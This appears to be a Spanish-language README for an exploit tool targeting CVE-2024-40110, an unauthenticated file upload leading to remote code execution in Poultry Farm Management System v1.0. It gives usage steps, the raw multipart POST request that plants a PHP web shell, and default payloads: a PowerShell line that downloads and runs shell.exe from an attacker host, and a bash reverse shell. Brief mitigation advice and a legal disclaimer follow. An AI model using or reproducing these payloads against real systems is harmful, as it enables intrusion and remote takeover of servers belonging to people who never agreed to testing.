
Exploit para CVE-2024-40110, una subida de archivos no autenticada que permite ejecución remota de código (RCE) en Poultry Farm Management System v1.0. Sube un shell PHP para ejecutar comandos arbitrarios en el objetivo.
Carga de Archivos No Autenticada con Ejecución Remota de Código
El Sistema de Gestión de Granja Avícola v1.0 contiene una vulnerabilidad crítica en la funcionalidad de carga de productos. La aplicación no valida ni sanitiza adecuadamente las cargas de archivos, lo que permite a atacantes subir archivos PHP disfrazados como imágenes de productos. Estos archivos PHP subidos pueden ejecutarse para lograr una ejecución remota de código.
POST /paultry/farm/product.php o POST /farm/product.php
La vulnerabilidad puede explotarse mediante:
requestscolorama (para salida coloreada)pip install requests colorama
O instalar todas las dependencias:
pip install -r requirements.txt
Ejecutar el script de forma interactiva:
python exploit.py
El script le solicitará:
==================================================
Herramienta Interactiva de Carga de Backdoor
==================================================
Ingrese la dirección IP del objetivo: 192.168.1.100
Ingrese el puerto del objetivo (por defecto: 80): 8080
Ingrese el comando a ejecutar (por defecto: payload powershell):
Comando: whoami
==================================================
CONFIRMACIÓN
==================================================
URL del objetivo: http://192.168.1.100:8080
Comando: whoami
¿Desea continuar? (sí/no): sí
✅ Entrada Interactiva - Solicita IP, puerto y comandos personalizados
✅ Valores por Defecto - Valores predeterminados convenientes
✅ Salida con Código de Colores - Salida de terminal fácil de leer con colores
✅ Paso de Confirmación - Verificar configuraciones antes de ejecutar
✅ Manejo de Errores - Mensajes de error elegantes para solicitudes fallidas
✅ Comandos Flexibles - Soporte para cualquier comando de shell o payload de PowerShell
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/system()POST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMANDO_AQUÍ');?>
El exploit fue probado en:
⚠️ ADVERTENCIA LEGAL
Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal.
Actualizar el Software - Aplicar parches de seguridad si están disponibles
Validación de Carga de Archivos
Configuración
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
Control de Acceso
Monitoreo
Error: Conexión rechazada
Solución: Verifique que la IP y el puerto del objetivo sean correctos y que la aplicación esté en ejecución
Error: Fallo al subir el shell. Código de estado: 404
Solución: La ruta del endpoint puede diferir. Rutas comunes: /farm/, /paultry/farm/
Error: La salida del comando está vacía
Solución: La ejecución de PHP puede estar deshabilitada o el archivo no se subió correctamente
Para problemas, preguntas o mejoras, consulte el repositorio de GitHub o la página de Exploit-DB.
Última Actualización: Diciembre 2024
Estado: Verificado y Probado